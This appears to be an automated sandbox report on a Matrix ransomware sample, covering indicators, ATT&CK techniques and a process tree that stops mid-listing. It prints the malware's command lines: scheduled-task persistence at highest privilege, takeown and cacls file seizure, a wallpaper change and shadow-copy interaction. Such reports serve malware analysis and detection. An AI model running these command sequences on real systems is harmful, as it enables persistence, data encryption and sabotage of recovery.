matrix | 9a58fcb6bf71775f7a5f833ea3780cdb67c421def1ff1851adc2061d366e0fdc

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\X:	NWDEiUim.exe
File opened (read-only)	\??\L:	NWDEiUim.exe
File opened (read-only)	\??\F:	NWDEiUim.exe
File opened (read-only)	\??\O:	7hL7bF1m64.exe
File opened (read-only)	\??\Y:	7hL7bF1m64.exe
File opened (read-only)	\??\V:	NWDEiUim.exe
File opened (read-only)	\??\S:	NWDEiUim.exe
File opened (read-only)	\??\Q:	NWDEiUim.exe
File opened (read-only)	\??\O:	NWDEiUim.exe
File opened (read-only)	\??\H:	NWDEiUim.exe
File opened (read-only)	\??\L:	7hL7bF1m64.exe
File opened (read-only)	\??\P:	7hL7bF1m64.exe
File opened (read-only)	\??\W:	7hL7bF1m64.exe
File opened (read-only)	\??\T:	NWDEiUim.exe
File opened (read-only)	\??\P:	NWDEiUim.exe
File opened (read-only)	\??\I:	NWDEiUim.exe
File opened (read-only)	\??\N:	7hL7bF1m64.exe
File opened (read-only)	\??\V:	7hL7bF1m64.exe
File opened (read-only)	\??\Y:	NWDEiUim.exe
File opened (read-only)	\??\A:	7hL7bF1m64.exe
File opened (read-only)	\??\G:	7hL7bF1m64.exe
File opened (read-only)	\??\H:	7hL7bF1m64.exe
File opened (read-only)	\??\U:	7hL7bF1m64.exe
File opened (read-only)	\??\M:	7hL7bF1m64.exe
File opened (read-only)	\??\S:	7hL7bF1m64.exe
File opened (read-only)	\??\T:	7hL7bF1m64.exe
File opened (read-only)	\??\Z:	NWDEiUim.exe
File opened (read-only)	\??\M:	NWDEiUim.exe
File opened (read-only)	\??\K:	NWDEiUim.exe
File opened (read-only)	\??\B:	7hL7bF1m64.exe
File opened (read-only)	\??\J:	7hL7bF1m64.exe
File opened (read-only)	\??\R:	7hL7bF1m64.exe
File opened (read-only)	\??\X:	7hL7bF1m64.exe
File opened (read-only)	\??\W:	NWDEiUim.exe
File opened (read-only)	\??\R:	NWDEiUim.exe
File opened (read-only)	\??\N:	NWDEiUim.exe
File opened (read-only)	\??\G:	NWDEiUim.exe
File opened (read-only)	\??\E:	NWDEiUim.exe
File opened (read-only)	\??\F:	7hL7bF1m64.exe
File opened (read-only)	\??\I:	7hL7bF1m64.exe
File opened (read-only)	\??\K:	7hL7bF1m64.exe
File opened (read-only)	\??\Q:	7hL7bF1m64.exe
File opened (read-only)	\??\Z:	7hL7bF1m64.exe
File opened (read-only)	\??\U:	NWDEiUim.exe
File opened (read-only)	\??\J:	NWDEiUim.exe
File opened (read-only)	\??\E:	7hL7bF1m64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\cfmdWBoX.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_24.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\download.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses-hover.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties	NWDEiUim.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_pwa_launcher.exe	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jabswitch.exe	NWDEiUim.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected]	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close2x.png	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\ui-strings.js	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#MMTA_README#.rtf	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\ui-strings.js	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#MMTA_README#.rtf	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\LogoDev.png	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected]	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\#MMTA_README#.rtf	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jmc.exe	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\ui-strings.js	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected-hover.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\hu_get.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_selected_18.svg	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-selector.js	NWDEiUim.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons.png	NWDEiUim.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main.css	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\ui-strings.js	NWDEiUim.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js	NWDEiUim.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\#MMTA_README#.rtf	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar	NWDEiUim.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar	NWDEiUim.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4608	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4360	vssadmin.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4944	WINWORD.EXE
4944	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe
4676	7hL7bF1m64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
4676	7hL7bF1m64.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeDebugPrivilege	4676	7hL7bF1m64.exe
Token: SeLoadDriverPrivilege	4676	7hL7bF1m64.exe
Token: SeTakeOwnershipPrivilege	4860	takeown.exe
Token: SeBackupPrivilege	4260	vssvc.exe
Token: SeRestorePrivilege	4260	vssvc.exe
Token: SeAuditPrivilege	4260	vssvc.exe
Token: SeTakeOwnershipPrivilege	1764	takeown.exe
Token: SeTakeOwnershipPrivilege	4696	takeown.exe
Token: SeTakeOwnershipPrivilege	3664	takeown.exe
Token: SeTakeOwnershipPrivilege	4032	takeown.exe
Token: SeTakeOwnershipPrivilege	4500	takeown.exe
Token: SeTakeOwnershipPrivilege	4368	takeown.exe
Token: SeTakeOwnershipPrivilege	4984	takeown.exe
Token: SeTakeOwnershipPrivilege	5116	takeown.exe
Token: SeTakeOwnershipPrivilege	4764	takeown.exe
Token: SeTakeOwnershipPrivilege	4476	takeown.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeTakeOwnershipPrivilege	4660	takeown.exe
Token: SeTakeOwnershipPrivilege	4788	takeown.exe
Token: SeTakeOwnershipPrivilege	5080	takeown.exe
Token: SeTakeOwnershipPrivilege	4536	takeown.exe
Token: SeTakeOwnershipPrivilege	4448	takeown.exe
Token: SeTakeOwnershipPrivilege	4992	takeown.exe
Token: SeTakeOwnershipPrivilege	4156	takeown.exe
Token: SeTakeOwnershipPrivilege	4836	takeown.exe
Token: SeTakeOwnershipPrivilege	4820	takeown.exe
Token: SeTakeOwnershipPrivilege	248	takeown.exe
Token: SeTakeOwnershipPrivilege	4116	takeown.exe
Token: SeTakeOwnershipPrivilege	4864	takeown.exe
Token: SeTakeOwnershipPrivilege	2768	takeown.exe
Token: SeTakeOwnershipPrivilege	5052	takeown.exe
Token: SeTakeOwnershipPrivilege	4504	takeown.exe
Token: SeTakeOwnershipPrivilege	4828	takeown.exe
Token: SeTakeOwnershipPrivilege	5012	takeown.exe
Token: SeTakeOwnershipPrivilege	4276	takeown.exe
Token: SeTakeOwnershipPrivilege	4180	takeown.exe
Token: SeTakeOwnershipPrivilege	276	takeown.exe
Token: SeTakeOwnershipPrivilege	252	takeown.exe
Token: SeTakeOwnershipPrivilege	4760	takeown.exe
Token: SeTakeOwnershipPrivilege	4252	takeown.exe
Token: SeTakeOwnershipPrivilege	4996	takeown.exe
Token: SeTakeOwnershipPrivilege	4832	takeown.exe
Token: SeTakeOwnershipPrivilege	5108	takeown.exe
Token: SeTakeOwnershipPrivilege	4416	takeown.exe
Token: SeTakeOwnershipPrivilege	4132	takeown.exe
Token: SeTakeOwnershipPrivilege	4572	takeown.exe
Token: SeTakeOwnershipPrivilege	4868	takeown.exe
Token: SeTakeOwnershipPrivilege	4900	takeown.exe
Token: SeTakeOwnershipPrivilege	4468	takeown.exe
Token: SeTakeOwnershipPrivilege	4116	takeown.exe
Token: SeTakeOwnershipPrivilege	4856	takeown.exe
Token: SeTakeOwnershipPrivilege	4488	takeown.exe
Token: SeTakeOwnershipPrivilege	4960	takeown.exe
Token: SeTakeOwnershipPrivilege	2232	takeown.exe
Token: SeTakeOwnershipPrivilege	4760	takeown.exe
Token: SeTakeOwnershipPrivilege	3832	takeown.exe
Token: SeTakeOwnershipPrivilege	1516	takeown.exe
Token: SeTakeOwnershipPrivilege	5092	takeown.exe
Token: SeTakeOwnershipPrivilege	5020	takeown.exe
Token: SeTakeOwnershipPrivilege	4864	takeown.exe
Token: SeTakeOwnershipPrivilege	4348	takeown.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE
4944	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 2756	2016	NWDEiUim.exe	76
PID 2016 wrote to memory of 2756	2016	NWDEiUim.exe	76
PID 2016 wrote to memory of 2756	2016	NWDEiUim.exe	76
PID 2016 wrote to memory of 3180	2016	NWDEiUim.exe	78
PID 2016 wrote to memory of 3180	2016	NWDEiUim.exe	78
PID 2016 wrote to memory of 3180	2016	NWDEiUim.exe	78
PID 2016 wrote to memory of 4172	2016	NWDEiUim.exe	83
PID 2016 wrote to memory of 4172	2016	NWDEiUim.exe	83
PID 2016 wrote to memory of 4172	2016	NWDEiUim.exe	83
PID 2016 wrote to memory of 4184	2016	NWDEiUim.exe	86
PID 2016 wrote to memory of 4184	2016	NWDEiUim.exe	86
PID 2016 wrote to memory of 4184	2016	NWDEiUim.exe	86
PID 4184 wrote to memory of 4276	4184	cmd.exe	87
PID 4184 wrote to memory of 4276	4184	cmd.exe	87
PID 4184 wrote to memory of 4276	4184	cmd.exe	87
PID 4172 wrote to memory of 4288	4172	cmd.exe	88
PID 4172 wrote to memory of 4288	4172	cmd.exe	88
PID 4172 wrote to memory of 4288	4172	cmd.exe	88
PID 4172 wrote to memory of 4360	4172	cmd.exe	90
PID 4172 wrote to memory of 4360	4172	cmd.exe	90
PID 4172 wrote to memory of 4360	4172	cmd.exe	90
PID 2016 wrote to memory of 4376	2016	NWDEiUim.exe	89
PID 2016 wrote to memory of 4376	2016	NWDEiUim.exe	89
PID 2016 wrote to memory of 4376	2016	NWDEiUim.exe	89
PID 4172 wrote to memory of 4428	4172	cmd.exe	92
PID 4172 wrote to memory of 4428	4172	cmd.exe	92
PID 4172 wrote to memory of 4428	4172	cmd.exe	92
PID 4376 wrote to memory of 4476	4376	cmd.exe	93
PID 4376 wrote to memory of 4476	4376	cmd.exe	93
PID 4376 wrote to memory of 4476	4376	cmd.exe	93
PID 4276 wrote to memory of 4500	4276	wscript.exe	94
PID 4276 wrote to memory of 4500	4276	wscript.exe	94
PID 4276 wrote to memory of 4500	4276	wscript.exe	94
PID 4376 wrote to memory of 4576	4376	cmd.exe	97
PID 4376 wrote to memory of 4576	4376	cmd.exe	97
PID 4376 wrote to memory of 4576	4376	cmd.exe	97
PID 4500 wrote to memory of 4608	4500	cmd.exe	98
PID 4500 wrote to memory of 4608	4500	cmd.exe	98
PID 4500 wrote to memory of 4608	4500	cmd.exe	98
PID 4376 wrote to memory of 4632	4376	cmd.exe	99
PID 4376 wrote to memory of 4632	4376	cmd.exe	99
PID 4376 wrote to memory of 4632	4376	cmd.exe	99
PID 4632 wrote to memory of 4648	4632	cmd.exe	100
PID 4632 wrote to memory of 4648	4632	cmd.exe	100
PID 4632 wrote to memory of 4648	4632	cmd.exe	100
PID 4648 wrote to memory of 4676	4648	7hL7bF1m.exe	101
PID 4648 wrote to memory of 4676	4648	7hL7bF1m.exe	101
PID 4276 wrote to memory of 4704	4276	wscript.exe	102
PID 4276 wrote to memory of 4704	4276	wscript.exe	102
PID 4276 wrote to memory of 4704	4276	wscript.exe	102
PID 2016 wrote to memory of 4748	2016	NWDEiUim.exe	104
PID 2016 wrote to memory of 4748	2016	NWDEiUim.exe	104
PID 2016 wrote to memory of 4748	2016	NWDEiUim.exe	104
PID 4704 wrote to memory of 4800	4704	cmd.exe	106
PID 4704 wrote to memory of 4800	4704	cmd.exe	106
PID 4704 wrote to memory of 4800	4704	cmd.exe	106
PID 4748 wrote to memory of 4816	4748	cmd.exe	107
PID 4748 wrote to memory of 4816	4748	cmd.exe	107
PID 4748 wrote to memory of 4816	4748	cmd.exe	107
PID 4748 wrote to memory of 4860	4748	cmd.exe	109
PID 4748 wrote to memory of 4860	4748	cmd.exe	109
PID 4748 wrote to memory of 4860	4748	cmd.exe	109
PID 4748 wrote to memory of 4916	4748	cmd.exe	110
PID 4748 wrote to memory of 4916	4748	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\NWDEiUim.exe
"C:\Users\Admin\AppData\Local\Temp\NWDEiUim.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\NWDEiUim.exe" "C:\Users\Admin\AppData\Local\Temp\NWSB5Qet.exe"
  2⤵
  PID:2756
- C:\Users\Admin\AppData\Local\Temp\NWSB5Qet.exe
  "C:\Users\Admin\AppData\Local\Temp\NWSB5Qet.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3180
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\cfmdWBoX.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4172
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\cfmdWBoX.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kYCoGzta.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kYCoGzta.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4276
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\G5WPN79P.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4500
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\G5WPN79P.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:4608
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4704
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    - Modifies file permissions
    PID:4576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4648
    - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m64.exe
        
        7hL7bF1m.exe -accepteula "qmgr.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\takeown.exe
